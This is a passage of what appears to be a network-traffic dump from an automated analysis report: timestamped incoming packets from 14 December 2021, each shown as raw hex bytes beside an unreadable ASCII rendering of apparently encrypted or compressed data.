24 82 ee 6c 0d df b7 1d e8 5c fc 22 40 a1 65 e4 83 47 d7 6f 15 e5 0b 5b 60 75 82 6d f6 ac bd 0d 48 4f 8a 0c cb be 0c d4 8e e4 18 27 49 61 4a 84 14 0e b0 0a c4 d3 bc b5 2e 39 37 0e ea f2 cf 6e ec 01 df cc 35 26 3b 01 fd d6 e8 94 7b 0a Data Ascii: FxWt=~Dq]YtfyA~!*b/Ha,PLtp(:sfaR{!oq3l8IO1UQd"K]bAz.TL[{tn<47$>OywNo$$l\"@eGo[`umHO'IaJ.97n5&;{
2021-12-14 12:42:36 UTC	176	IN	Data Raw: 3b f8 18 5a 9a 72 72 44 8b 61 90 61 c9 81 ce d8 58 b6 c9 c5 54 30 9d 41 3d 93 52 d5 91 3f ba 4d 1f 09 43 ac 88 b8 9d be 06 b2 ac 2a 39 ce 3a 68 42 74 c0 a5 07 08 d9 05 7b ab fc 3a 8a 09 6a 70 0d f8 b0 35 9e 4b 38 c2 6a 30 f3 c6 77 4d b0 71 f8 ba 94 ed 4f 3f 71 b6 cf 5d 23 93 ee c6 f6 1b 3d a7 a1 94 11 b8 26 a2 a7 8e ac fb e7 1c eb 6f 6a 83 cd 2c c4 09 13 b3 b2 42 6e 71 d3 65 b7 7d 35 c2 cd 1d ee 09 6c 3d 20 93 ef 24 e6 ab bf 44 ab a6 3f b5 c3 53 73 cd 9e 3d 31 ea 76 3e 73 16 a4 9a e2 bb c0 55 f6 31 6a ad 22 5c 81 d1 5f 47 23 02 2c 9a ec 51 2c 93 44 f6 6d 1f 52 3b 16 b0 54 e1 98 02 1f b8 6c 6f c5 94 0c 50 21 6e 91 f9 12 33 de a4 ca dd 42 1b 41 63 3f 36 87 42 c7 52 ea 80 67 a5 00 6d 32 da b5 72 60 f7 dc 5c 1c a4 5e 5e 0c e3 e8 ec f8 67 68 72 ab e5 57 61 5a Data Ascii: ;ZrrDaaXT0A=R?MC*9:hBt{:jp5K8j0wMqO?q]#=&oj,Bnqe}5l= $D?Ss=1v>sU1j"\_G#,Q,DmR;TloP!n3BAc?6BRgm2r`\^^ghrWaZ
2021-12-14 12:42:36 UTC	177	IN	Data Raw: 7f 14 b8 b9 77 1f a3 62 3d 05 af 63 86 1d 4e 18 c1 08 dc 7b 2a ab e4 47 9f 90 0e 98 c4 e7 c5 29 5f a7 c0 93 20 0d 06 59 b2 ef 91 24 9a 5d 4d 3c e0 cc 04 76 3e 45 75 f0 7c e0 84 68 02 e1 0d 2a 1f b9 58 e1 2c 60 d4 7c 03 9b 9e 53 81 af 31 83 b0 12 2f 30 38 a5 e4 d9 37 83 4f f8 67 2a f6 0f 52 9d 23 12 ab 2f eb ca b5 38 11 22 f2 5c 79 de 9c 34 59 df 9b 50 37 86 f4 84 8c c9 80 1a 53 19 15 bf dd a3 7c ca b1 34 33 3d 5b 36 60 fd f9 a9 20 bf ea 88 07 07 9a 01 bb c8 d6 66 45 90 97 4f 1c 71 06 82 b9 4d ef e6 e8 09 ae d8 76 39 be 3f af a1 0c 43 f0 d8 a8 bd cc d9 74 7a 06 67 33 7a 3f dd 2f 64 ec 11 1b 67 2e 1e 96 77 81 b4 94 e8 66 02 81 3a c1 b5 0d e0 75 70 1d e3 36 21 e2 4a bf 70 4e ab aa 2b d8 be 71 42 de f4 1b c1 4b 1c 5c 9a 8c 0d 68 21 b9 45 68 d9 3b df 35 73 fc Data Ascii: wb=cN{G)_ Y$]M<v>Eu\|hX,`\|S1/087Og*R#/8"\y4YP7S\|43=[6` fEOqMv9?Ctzg3z?/dg.wf:up6!JpN+qBK\h!Eh;5s
2021-12-14 12:42:36 UTC	178	IN	Data Raw: 37 84 37 03 f2 70 98 83 ec 5a b7 44 f5 73 fa b6 c1 e9 15 01 e5 74 15 6e 34 2b 87 b2 41 53 ba cc 8f 9b 59 72 47 dd 27 8e e8 76 11 d6 56 a4 8c 31 06 c4 fa 24 c5 fd ec 90 29 92 04 99 8f 11 e2 81 b3 a2 75 ed 5f cf 76 bb c5 f2 b0 97 04 59 ea 1b 9d 59 9c 9a b0 e7 59 64 a3 2d 78 a6 ce 08 6f 26 4f fc c8 5c 22 7c 5f b4 5d 9f 27 fa 45 ff 68 36 e8 95 35 d2 14 90 b5 bb 89 04 a0 25 a5 90 c2 85 68 07 b7 4b 04 16 78 99 32 4f 94 7d 69 2e 59 80 1c 45 60 40 93 87 4e 82 fb 4c 65 57 09 03 7e cc a9 99 d1 d5 bc 3e 7e c6 9a 53 0a 25 a7 26 91 5d 9b 6a 2e b6 09 93 59 0c 18 40 34 06 ce 79 e0 b0 85 43 16 7e 9d 12 0f ab e1 eb 28 62 2f e8 aa 2f 86 d6 01 95 12 a8 45 67 ad 4c 15 62 bb 2b d6 3a d8 72 73 f4 83 a9 fa 1a bc 02 ab 51 7b 21 6f 3d e3 65 dc 53 3a 6c b4 e4 7a 7c 38 9e 49 cf 31 Data Ascii: 77pZDstn4+ASYrG'vV1$)u_vYYYd-xo&O\"\|_]'Eh65%hKx2O}i.YE`@NLeW~>~S%&]j.Y@4yC~(b//EgLb+:rsQ{!o=eS:lz\|8I1
2021-12-14 12:42:36 UTC	179	IN	Data Raw: 1c 07 5d 2e a2 96 7e e6 3a 52 86 f8 e6 2c 9d 41 58 78 77 8f 56 9d de 64 b6 e9 e4 3f 9a f7 fc 72 aa 16 6d e9 4a f0 c8 cc 22 42 31 73 b7 ef 0a f4 d9 89 64 c0 86 24 23 fb 4a 24 83 af 5a 7f 55 c9 68 be 26 5e b4 89 46 05 dc 6e 9a d9 75 67 87 38 80 64 cf f5 31 2b 88 91 26 79 f0 1a 96 74 45 7f 39 c1 c6 56 cf 51 48 6f db ec 9c 7c 83 d4 b5 c0 fc 20 8e 1e fb 16 4d 28 3e 5b 22 c7 8a 79 e7 79 d8 84 80 e4 82 33 2f 18 da 86 66 62 91 88 90 91 09 9c f8 22 dc 6e 24 e3 39 f9 89 7d 3f f8 18 5a 9a 45 51 44 8b 61 90 61 c9 34 f4 d8 58 b6 c9 3f 77 30 9d 41 3d 93 52 21 95 3f ba 4d 1f 48 60 ac 88 b8 9d be 06 50 92 2a 39 ce 3a 15 61 74 c0 a5 07 08 d9 ff 78 ab fc 3a 8a bd 4a 70 0d f8 b0 35 9e 8a 2a c2 6a 30 f3 31 57 4d b0 71 f8 ba 94 92 4c 3f 71 b6 cf f4 03 93 ee c6 f6 1b 3d 2c b2 Data Ascii: ].~:R,AXxwVd?rmJ"B1sd$#J$ZUh&^Fnug8d1+&ytE9VQHo\| M(>["yy3/fb"n$9}?ZEQDaa4X?w0A=R!?MH`P9:atx:Jp5j01WMqL?q=,
2021-12-14 12:42:36 UTC	181	IN	Data Raw: 85 26 c5 0e 46 20 32 50 27 33 e8 51 c5 1d f2 66 b7 4a 12 5b 7f f6 96 9a fe 7a 8e c9 42 13 71 87 20 4f 41 25 e7 e7 09 83 98 2b 09 61 b0 3c c5 0a 9a 8b 7d 5b 0f d1 c5 a4 88 0e 74 6c 40 87 65 ba d7 04 b9 6c 1e f8 de 0a 92 54 04 f6 fc 8c f7 e0 fc 25 fe a0 eb b9 cd 0b 2d d1 78 b4 71 06 24 7c 65 d5 7a 7a 98 cd 71 6f d5 a0 cb 7a db 58 a8 90 20 a9 fe b5 ca 7a 4a 5a 52 5f e2 b1 38 97 dc 8e 34 95 03 4f 31 17 76 b7 c6 1f e0 a8 22 43 92 bf 13 f4 7b b2 ad 06 6b ee 9f e0 68 72 7f 14 b8 e7 56 1f a3 62 3d 05 af 1d 85 1d 4e 18 c1 e9 fc 7b 2a ab e4 47 9f a7 11 98 c4 e7 c5 0b 7c a7 c0 93 20 0d 06 4b b1 ef 91 24 9a 3a 6e 3c e0 cc 04 76 3e 77 71 f0 7c e0 84 4c 21 e1 0d 2a 1f b9 58 17 28 60 d4 7c 03 76 bd 53 81 af 31 83 b0 bf 18 30 38 a5 e4 f5 14 83 4f f8 67 2a f6 6c 56 9d 23 Data Ascii: &F 2P'3QfJ[zBq OA%+a<}[tl@elT%-xq$\|ezzqozX zJZR_84O1v"C{khrVb=N{G\| K$:n<v>wq\|L!X(`\|vS108Og*lV#
2021-12-14 12:42:36 UTC	182	IN	Data Raw: 69 91 b8 59 ab 4e 9c 21 38 87 65 8f 2f f4 25 e3 73 8b 83 7a c8 a0 eb e8 ef 12 47 60 fa 9b ba 24 3a 5f 9e 75 f2 c0 b6 8a 65 50 eb 99 a9 41 c4 d3 94 a8 6b fb a4 2f e5 2e ce 5f d4 cd 26 b0 09 08 89 4f e6 da c1 60 26 5e 6d 57 f9 b1 49 58 02 c3 59 fb ab c0 5c c9 1f 79 99 db 88 98 a4 e3 d5 4f 39 66 66 b2 63 50 1c bb 77 24 04 66 ce 9f 6f a3 7d 44 57 44 a0 c8 b7 4a 12 4d 1a ae 7a 65 d6 c8 56 58 21 bd f8 f9 6b db 30 a2 43 c4 c5 f7 ef 21 69 dc 62 82 99 14 0a 32 1e 3c 84 1b f4 79 bc a0 77 0b e1 6e 79 82 77 c2 e1 44 6f 83 14 3b 1e 1a 27 0c 38 00 42 6d 63 ed f7 e2 9e c4 3e 5a cb 5f a0 59 12 7b 43 40 05 1e 66 91 d9 b8 30 89 88 db aa 6e ba e0 28 6b 9a a4 cc 3b b3 ac f4 6f 57 26 a7 7a 9e 57 89 7b 4d fe 47 1c be ac 76 eb fa cd a3 2e 1a 2e 24 68 4d 65 14 2a 6e 56 73 85 2c Data Ascii: iYN!8e/%szG`$:_uePAk/._&O`&^mWIXY\yO9ffcPw$fo}DWDJMzeVX!k0C!ib2<ywnywDo;'8Bmc>Z_Y{C@f0n(k;oW&zW{MGv..$hMe*nVs,
2021-12-14 12:42:36 UTC	183	IN	Data Raw: 75 7b a9 07 82 c5 7b e5 e9 57 74 1b 28 7d cc bd 57 83 c0 c7 73 d0 6a 7f 50 c1 31 95 c7 29 67 eb 80 b5 37 84 37 4e fd 70 98 83 ec 83 e1 44 f5 73 fa b6 c1 f5 25 01 e5 74 15 b6 62 2b 87 b2 41 53 ba a8 82 9b 59 72 47 8a 76 8e e8 76 11 d6 56 8c ba 31 06 c4 fa 6f 94 fd ec 90 29 92 04 aa 9a 11 e2 81 b3 6c 24 ed 5f cf 76 bb c5 ba b4 97 04 59 ea d1 cc 59 9c 9a b0 e7 59 52 b6 2d 78 a6 ce 7e 3e 26 4f fc c8 5c 22 7e 5b b4 5d 9f 27 c0 14 ff 68 36 e8 95 35 17 03 90 b5 bb 89 f9 f2 25 a5 90 c2 85 68 1b b3 4b 04 16 78 a5 61 4f 94 7d 69 2e 59 70 0a 45 60 40 93 f4 1d 82 fb 4c 65 57 09 a6 7a cc a9 99 d1 e3 ef 3e 7e c6 9a 53 0a 1a b2 26 91 5d 9b 98 7d b6 09 93 59 0c 18 e1 3d 06 ce 79 e0 fe d6 43 16 7e 9d 12 0f b9 f4 eb 28 62 2f ba f9 2f 86 d6 01 95 12 78 52 67 ad 4c 15 b4 e9 Data Ascii: u{{Wt(}WsjP1)g77NpDs%tb+ASYrGvvV1o)l$_vYYYR-x~>&O\"~[]'h65%hKxaO}i.YpE`@LeWz>~S&]}Y=yC~(b//xRgL
2021-12-14 12:42:36 UTC	184	IN	Data Raw: 08 6d 1c 2a a2 5a 01 cd 3c e7 ff ab fe 6d 3d 0f 46 6b ec 2e 2c 93 7e 7a 23 45 11 7f 94 2e 12 27 9e e5 1c fc 7e 2e a2 96 7e d4 4b 52 86 f8 e6 2c 9d 4a 6f 78 77 8f 56 ea af 64 b6 e9 e4 3f 9a 8d d7 72 aa 16 6d da 3b f0 c8 cc 22 42 31 fa 86 ef 0a f4 d9 46 15 c0 86 24 23 fb 4a bd b2 af 5a 7f 55 9b 19 be 26 5e b4 89 46 6b df 6e 9a d9 75 36 f6 38 80 64 cf f5 31 e5 b8 91 26 79 f0 cb e4 74 45 7f 39 c1 c6 a6 cd 51 48 6f db 3d ee 7c 83 d4 b5 c0 fc ea be 1e fb 16 4d 78 4d 5b 22 c7 8a 79 e7 25 d9 84 80 e4 82 60 5c 18 da 86 66 62 91 e1 a0 91 09 9c f8 f2 af 6e 24 e3 39 f9 89 0e 30 f8 18 5a 9a 95 22 44 8b 61 90 61 c9 3f c4 d8 58 b6 c9 6e 04 30 9d 41 3d 93 52 15 98 3f ba 4d 1f 67 13 ac 88 b8 9d be 06 68 a4 2a 39 ce 3a e4 13 74 c0 a5 07 08 d9 ce 6d ab fc 3a 8a 8f 3b 70 0d Data Ascii: mZ<m=Fk.,~z#E.'~.~KR,JoxwVd?rm;"B1F$#JZU&^Fknu68d1&ytE9QHo=\|MxM["y%`\fbn$90Z"Daa?Xn0A=R?Mgh9:tm:;p
2021-12-14 12:42:36 UTC	186	IN	Data Raw: 42 5c 23 9a fd 96 cf 1e 65 15 e4 80 be 51 87 58 2f e3 d3 fd 00 64 c7 06 73 a4 78 71 fd 2a 00 5a 77 89 a4 26 c5 0e 46 05 43 50 27 33 e8 51 c5 19 ec 66 b7 4a 12 a6 0e f6 96 9a fe 7a 8e 71 6d 13 71 87 20 72 30 25 e7 e7 09 83 98 43 2c 61 b0 3c c5 6f eb 8b 7d 5b 0f d1 c5 e8 bc 0e 74 6c 40 a1 14 ba d7 04 b9 6c 1e 5f fa 0a 92 54 04 1c 8e 8c f7 e0 fc 25 fe 64 de b9 cd 0b 2d ff 0b b4 71 06 24 7c 65 4f 5e 7a 98 cd 71 05 a6 a0 cb 7a db 58 a8 54 15 a9 fe b5 ca 5c 39 5a 52 5f e2 b1 38 71 fb 8e 34 95 03 95 42 17 76 b7 c6 1f e0 b7 15 43 92 bf 13 a9 08 b2 ad 06 6b ee 9f 6d 4b 72 7f 14 b8 bb 25 1f a3 62 3d 05 af 10 b2 1d 4e 18 c1 0d 8e 7b 2a ab e4 47 9f dd 3a 98 c4 e7 c5 2c 0d a7 c0 93 20 0d 06 dc 80 ef 91 24 9a 50 1f 3c e0 cc 04 76 3e 10 40 f0 7c e0 84 65 50 e1 0d 2a 1f Data Ascii: B\#eQX/dsxqZw&FCP'3QfJzqmq r0%C,a<o}[tl@l_T%d-q$\|eO^zqzXT\9ZR_8q4BvCkmKr%b=N{G:, $P<v>@\|eP*
2021-12-14 12:42:36 UTC	187	IN	Data Raw: 60 c5 84 ad 2a 96 20 18 d3 46 64 ef 39 86 0e 1e d5 03 6d a5 2a 8e ed a5 d2 db 01 51 cf 2e 96 9c 0d 18 58 3a ba dd 93 28 80 68 39 e8 65 b7 27 c9 25 37 73 c4 90 98 ca a1 ea 3d e2 fc 52 87 f9 bb b7 7b 00 f4 9e ad d9 bc b4 3f 66 98 cc f7 a9 93 fd ff b1 59 69 ac a4 c3 fa 3f ce e3 d4 41 16 4c 08 c9 89 79 fe ba c0 47 24 0d 42 59 c0 a2 48 2f 17 56 5a 51 bd 85 75 be 1c 5f a1 3a bb 97 a7 5c d4 04 11 8a 67 fe 62 7d 33 62 75 ed 04 87 e9 a0 75 8c 7f 40 5b da 9a f3 b6 fe 1e 92 1b 75 7e 0e cd a6 56 bd 19 07 dc db 68 0c 31 b9 7d a4 c7 a3 ee 2f 40 f6 61 ab 98 15 39 23 19 f3 87 c2 d3 a5 86 f3 76 96 c2 c4 7a 24 6c 88 d1 79 6c 50 2e 59 0d 5d 24 43 38 1a 56 98 61 f1 f6 d6 bf cc 3d 3b ca ce 83 1b 31 f4 40 a7 1a d4 5c e2 d8 96 15 0c 88 20 af 0d ad c4 2b 87 a1 ac dc 65 b0 bb f5 Data Ascii: `* Fd9m*Q.X:(h9e'%7s=R{?fYi?ALyG$BYH/VZQu_:\gb}3buu@[u~Vh1}/@a9#vz$lylP.Y]$C8Va=;1@\ +e
2021-12-14 12:42:36 UTC	188	IN	Data Raw: c6 b5 f3 c5 66 69 01 05 26 cb b5 db 61 4f ca e5 04 e3 5d 49 1c ee ec 2f fb 85 60 c1 af 22 50 53 47 9c 7d 12 ee 6f 92 d6 7b da e9 ec 65 24 2f 29 cc d9 1a 46 c8 16 70 cf 5a 57 53 ee 33 ec cf f7 2a 38 82 f8 23 2a 3e 9a f4 2e 91 c0 e5 b7 a7 68 d0 eb f9 c1 c2 a0 0a a5 ee 30 16 98 13 07 86 5b 42 9c 9a e6 80 94 58 71 4a 8c 32 25 e8 01 35 09 57 e0 b8 4f 11 c2 f3 37 d1 43 e5 10 20 f5 07 6f 91 d2 e4 0d b0 60 7e ca 5b ce 72 a8 d0 1c b7 80 05 53 fd 40 8d aa 9f 34 af 54 5d 51 a2 48 59 92 cf 49 78 e9 62 61 c1 7b 22 e3 58 96 56 53 27 af 51 36 61 3f ec 94 06 ce 1c c7 b7 43 9c 56 b0 ce a7 21 c8 bb 6d bf b2 23 13 b4 71 cb 27 63 9c ff 6e 51 5b f5 08 44 6b 94 93 03 73 59 fe 1d 67 ef 2c 6d 7d 83 ab e6 fd b4 a3 b0 7e 33 a8 fc 00 de a5 42 89 1f 91 af 3b 31 1c da 58 0b 19 d7 3e Data Ascii: fi&aO]I/`"PSG}o{e$/)FpZWS38#>.h0[BXqJ2%5WO7C o`~[rS@4T]QHYIxba{"XVS'Q6a?CV!m#q'cnQ[DksYg,m}~3B;1X>
2021-12-14 12:42:36 UTC	189	IN	Data Raw: d3 3f ba 9c 4a 39 81 fc cd 2f 75 95 c5 5a 1a b6 4d 47 55 5a 96 36 6a c2 ae b9 6b d0 2b bc 13 eb e9 93 59 ea 09 c0 b7 5d 05 1b 3d 4c fe cf f8 e0 48 e2 53 4a ea 96 09 80 4c bd 27 1b 19 a5 c5 1d 14 f0 b8 35 0a 92 7e 9c b4 a7 68 de 1c 46 a3 6b e1 8b 9b 80 47 cd 63 cb 50 cd ce 2f b7 e0 e0 98 8e 78 c7 4d a8 3c 7e 54 7c 13 ca f1 37 0f 33 b7 b2 cb 21 ab ce 77 40 09 81 03 34 c4 4a a3 a7 c1 4f ab 55 37 7a 7f 31 0f b5 48 55 68 ce c9 9e 2c 7c 1a b0 73 86 ed eb 94 26 b4 b8 f2 31 df f2 5f b7 e1 45 3e 21 c6 c2 64 cf 52 5f bb db 79 a8 d1 9b 7d b5 8f d1 f7 a7 e9 f8 16 61 f5 1a c8 23 4b ab 0a f2 31 d8 4c a7 8a 82 eb 0f 34 ff 94 7c e5 90 e4 ba 28 0d f0 f9 24 d7 33 22 a2 3b e2 ad 1c 3d 17 1f 32 8e 2b 70 47 8e b7 b2 46 d3 d5 c0 d7 74 13 ca d1 50 fe b4 f6 27 ac 52 72 b6 1b a2 Data Ascii: ?J9/uZMGUZ6jk+Y]=LHSJL'5~hFkGcP/xM<~T\|73!w@4JOU7z1HUh,\|s&1_E>!dR_y}a#K1L4\|($3";=2+pGFtP'Rr
2021-12-14 12:42:36 UTC	191	IN	Data Raw: 6d e0 6d 04 5e a0 64 61 a0 5a f6 c1 47 96 36 6f ce f8 85 50 61 4b fd a9 6c 8f df cc 72 f8 47 65 f1 07 43 c0 05 b5 fa 61 ee d6 66 d1 e3 63 e3 97 84 99 2c 93 ff 10 24 7b c5 aa 7d 0f 27 ba fa 04 25 df 77 da 86 f1 cb 55 46 43 1f 3c 17 db eb 0e c2 73 fc 4e b1 4e 17 b5 49 4f b1 8b ff 4c a2 61 43 24 74 73 30 1f 4a 96 e7 62 1c f1 bf fe 2e 0e a2 ad e2 5b b1 a7 58 9b 0f a6 c2 f9 aa e6 72 38 42 ab 6f bd ff ed be 78 04 da d7 1d 97 1b 17 9d d7 a7 f5 62 e6 93 fa 70 ed 2f df 65 2d ac 56 20 5d 86 28 b3 64 0c 4e 52 9e f4 70 77 dd b1 cb 36 da e0 8d 68 24 66 fd db c2 9c 4f e1 55 b0 fb 84 3b e8 fa 4a 25 2d 2b 71 1d 3b 7e 35 c1 cd e1 d2 15 7f 97 8e 12 b9 78 9e ac 0f 6f 04 b0 ee 65 c0 7c 47 9d 99 70 51 a2 4c 35 11 a8 52 84 7a 5c b8 e9 55 d0 a8 04 85 e5 8d 9e 2b 26 08 c0 c6 c4 Data Ascii: mm^daZG6oPaKlrGeCafc,${}'%wUFC<sNNIOLaC$ts0Jb.[Xr8Boxbp/e-V ](dNRpw6h$fOU;J%-+q;~5xoe\|GpQL5Rz\U+&
2021-12-14 12:42:36 UTC	192	IN	Data Raw: 22 f0 54 40 c8 8b 47 a9 6a 2a ce 7d 70 71 70 18 63 fe ac cd 08 68 58 ac 29 a0 bb 4d d6 d6 17 65 22 0c 61 54 84 03 0a 97 28 b1 d3 ec 44 d4 33 3f 0e 74 f7 1e 6d 14 2a 2e c9 3b cf 32 01 6d d3 c6 b8 65 0d d2 6e d1 94 05 93 3f 9c e4 38 3f 65 5e 3b 8b 0b b0 73 bf ac da e4 8e eb d5 f8 db 7c c6 f8 cd ba d8 02 1d 9e 66 f2 4b b6 bd 66 a5 e9 f9 a9 d9 fc ca 94 84 6b 24 a4 19 f2 13 cc 41 d4 2a 1e 9e 09 6b 89 ca e6 59 c2 ef 24 50 6d be c0 33 49 73 02 10 59 cb bc 3d 5e 98 1f c5 a0 a2 88 dd a4 f6 d5 24 3a c5 64 46 63 42 25 bf 76 84 04 db ce f3 76 e4 7f f2 57 83 99 6b b7 99 12 9e 1a 1f 7e 90 d4 a8 56 5f 18 7c f8 87 6a 8d 30 34 59 67 c7 49 ef 04 50 dd 60 41 99 91 0a 13 1a 3a 86 4d f4 d4 85 41 77 88 e1 bd 79 fd 6d 0f e3 7c 6f 89 2f 2a 1e 07 27 ba 39 63 46 96 61 b0 f6 e2 a4 Data Ascii: "T@Gj}pqpchX)Me"aT(D3?tm.;2men?8?e^;s\|fKfk$AkY$Pm3IsY=^$:dFcB%vvWk~V_\|j04YgIP`A:MAwym\|o/'9cFa
2021-12-14 12:42:36 UTC	193	IN	Data Raw: 51 e5 39 72 5a 77 98 34 3f 9c 60 12 c5 fd 02 90 2f 6e 91 92 1f 92 c7 42 c8 54 4b 3e 4c 61 3f 79 aa dc d9 8e e9 ea 6d d0 1e 6f 36 98 81 be 7d 61 dc 24 11 4a 42 23 0c c4 f2 e6 e6 67 68 42 a4 2f 4e 87 58 96 54 e6 f3 05 82 f3 67 b1 e7 25 73 83 24 3a d2 77 13 72 cc 05 7d 46 6a 4f 4d e5 3d e8 c7 22 11 39 9d b5 37 c7 3f 69 ea 96 9a 9d e4 b4 ba 46 f5 77 ee 11 de 6d 27 c9 ee 01 0b 98 27 89 af a5 62 c5 ba df a6 b1 46 0f 47 9d 17 91 cb 76 11 53 4a 8b b6 d7 04 07 d1 f0 f9 ff ec 5f 26 b0 2d d0 8e 31 cd 30 ae fe 61 10 75 75 5f 2d c5 46 b1 44 18 24 ea 31 84 99 92 9a b0 ab 50 3a ac cb 7a 13 cd 6a 75 24 4f 45 eb 08 2c 65 58 56 5f e1 27 3a 51 f8 68 33 e8 01 35 1a 15 71 b7 c4 89 e7 b4 2e a5 92 c2 1c 68 5d b0 af 06 7f 78 92 27 4c 94 68 69 b5 59 79 1d b5 62 32 93 ae 5b 97 fb Data Ascii: Q9rZw4?`/nBTK>La?ymo6}a$JB#ghB/NXTg%s$:wr}FjOM="97?iFwm''bFGvSJ_&-10auu_-FD$1P:zju$OE,eXV_':Qh35q.h]x'LhiYyb2[
2021-12-14 12:42:36 UTC	194	IN	Data Raw: 76 c1 a5 7b 9f b8 b3 7b 4d 83 46 e9 be 69 72 73 f9 d3 a3 9c 20 53 25 0d 4d f2 14 f5 4e d5 71 fa 2c 05 0c 2a d9 71 cb 50 b2 48 91 ef c6 56 8c 54 32 b7 72 b0 c4 4d a8 a5 8c 08 fa 8c 8a e9 65 cc 64 a2 51 c5 2f b6 b0 df 42 6c e7 3c 9d cd 9b 36 bf 3d 5e 82 0b 6e 3d d1 04 9e 1a e4 4d 4f 38 da fb 3e b7 3b 52 00 5b 9f c1 de 0d 07 43 71 6e 5d 99 97 bb c1 c3 0d 58 1c 4b 22 21 7d 44 2b 45 22 02 d1 0d 9b 68 39 75 b8 8a 14 b0 50 39 e9 b1 2d 77 9a 90 3f 5c 15 12 c4 5f 2b 50 5a 6e 93 6f 37 52 b4 42 c9 a0 64 fe 3f 61 3d 36 a0 d6 b8 8e e8 66 4d da 7f 6f 34 d8 9c 70 e1 61 dd f6 2e 40 dd 23 16 fd b4 ec b3 63 73 e4 25 e1 18 83 69 2f 4b d0 58 01 b3 c5 3b 70 5e 21 42 fd 68 03 75 73 22 81 84 c4 c8 42 5e 1e 26 24 0f eb fe c5 5b ea 2f b5 7a 12 77 57 5b 96 c3 fe ba 97 d6 46 77 6a Data Ascii: v{{MFirs S%MNq,*qPHVT2rMedQ/Bl<6=^n=MO8>;R[Cqn]XK"!}D+E"h9uP9-w?\_+PZno7RBd?a=6fMo4pa.@#cs%i/KX;p^!Bhus"B^&$[/zwW[Fwj
2021-12-14 12:42:36 UTC	195	IN	Data Raw: cc 04 e0 3e d8 0c 57 3d ce cc 4e 3e e3 6c 4a 2e 2f 11 fa 43 f3 bb 64 71 73 f1 3d e4 cf 00 15 f9 ed 46 ba 56 bd 87 07 53 ee 21 98 56 bc b3 c8 36 15 55 27 ca 8d 82 a4 d0 4a 71 85 f2 25 32 51 ed 3d 39 00 96 1a 7a c7 b7 41 c4 6b b4 cd 63 64 54 cb a5 c0 0c a3 82 90 33 30 39 a2 0c e5 95 ab 1c bd a7 e1 64 e3 f5 27 d6 48 a0 35 12 ab f7 7e 2e 71 73 67 dc 17 d4 32 ea 26 cb cd 1c 6e f7 51 db 04 3e cf a6 51 ff 89 a2 3b 49 4a 06 35 56 8d 5b 81 4b f6 dd 5e 1b 8b 4f 55 f8 03 b2 10 94 1a 01 9d d5 26 ad 1a 66 b2 14 19 6f 15 04 4f b2 c5 de 79 27 38 ca 48 aa c7 11 e6 de 4e 79 14 49 35 33 d1 ca 61 1c 17 8d d3 3a 24 4e 5d 7e 60 88 c4 6c 6f 48 45 eb a2 75 e6 0e 01 b0 92 cb 94 5a 34 73 5b aa 8d 14 a5 61 df 62 08 21 48 f1 1e 20 14 b3 32 2b 89 4c e5 97 ad 4a d6 2a 60 b1 cf d2 8b Data Ascii: >W=N>lJ./Cdqs=FVS!V6U'Jq%2Q=9zAkcdT309d'H5~.qsg2&nQ>Q;IJ5V[K^OU&foOy'8HNyI53a:$N]~`loHEuZ4s[ab!H 2+LJ*`
2021-12-14 12:42:36 UTC	197	IN	Data Raw: 7c db 41 ca db b8 f8 7b 06 c6 f5 cc 5c e0 3a b6 14 76 83 f1 07 da 8d b3 3c 19 fe 01 de be 2f 26 0d b0 e4 a3 ff 74 2c 46 3c 4d 90 40 75 2b e4 71 9d 78 94 6b 19 d9 14 9f cf f1 74 91 ad 93 f6 c9 68 32 f0 27 13 83 73 a8 e3 d9 ac b3 b2 8a 8a 30 69 07 9a 51 a7 7a 10 d5 e7 42 0b b2 d3 fa f7 9b 50 ea cd 1d bb 0b 2f 6b 20 41 b9 1a a0 1b bd 7f fd fb 7b e1 c3 1b 25 5b f9 a4 53 53 3d 15 73 1d c2 ec bd f2 96 c3 97 0f 69 29 76 21 e2 13 5c 21 75 02 49 5a ec 0e 6d 75 21 dd 6d f2 06 39 55 e7 54 33 cf 90 59 09 6e 54 92 5f 48 05 21 26 c6 6f 73 07 c9 20 9f a0 21 ab 42 05 68 36 e2 83 c7 e8 be 66 02 8f 00 0a 74 8a fd 34 17 05 b3 b2 7c 2c 1b 5a 4b a7 a6 b9 b1 2e 12 b1 e8 95 15 c1 00 5c 2d bb ba 05 c1 ad 09 24 e9 68 1c 8b 4f 46 a5 1b 76 c4 b8 90 73 04 32 1e 11 7f 33 ac 9f c5 66 Data Ascii: \|A{\:v</&t,F<M@u+qxkth2's0iQzBP/k A{%[SS=si)v!\!uIZmu!m9UT3YnT_H!&os !Bh6ft4\|,ZK.\-$hOFvs23f
2021-12-14 12:42:36 UTC	198	IN	Data Raw: 26 fa 87 f6 54 d2 68 48 c0 68 fd 3a ff 18 07 5b 94 84 65 93 56 d3 2e 72 1b 9d e3 6a 7b bc 5e 45 7c 44 3d cb 68 f4 a4 6e 71 51 fc 35 e4 af 42 70 c4 f1 64 b9 5e bd e4 35 53 ed 2a b5 08 d8 93 be 03 1a 45 0b c2 8d 81 85 da 5c 74 b4 b1 1e 07 48 ea 26 0a 45 e4 37 56 eb b9 7d e8 4f 81 bf 3e 09 65 dd b6 d2 0f a3 de cc 7e 34 38 b5 62 c3 90 e8 46 d8 98 c5 68 f5 ff 54 e1 43 b8 55 2a a6 fc 4d 7b 14 72 4b ec 0b 8e 63 85 10 cb ac 1f 5e ca 60 ed 5e 6b 8a 9c 5a c3 a1 a2 1a 14 11 65 08 57 89 3f 81 56 d6 8b 14 6f 8a 4e 75 f5 18 e5 47 94 07 05 91 ef 33 87 1d 66 87 75 17 78 01 69 3a 85 c9 ee 68 3e 36 d6 48 ac db 37 bb b2 73 7c 55 1d 13 39 e1 83 7c 0d 55 e6 a6 1b 24 7c 5c 47 6f 8e 93 2c 0a 5a 45 ce a8 64 a2 6e 73 98 b3 fe f2 08 0d 00 19 83 d5 65 fe 2d fb 44 38 42 00 ab 48 5f Data Ascii: &ThHh:[eV.rj{^E\|D=hnqQ5Bpd^5SE\tH&E7V}O>e~48bFhTCUM{rKc^`^kZeW?VoNuG3fuxi:h>6H7s\|U9\|U$\|\Go,ZEdnse-D8BH_
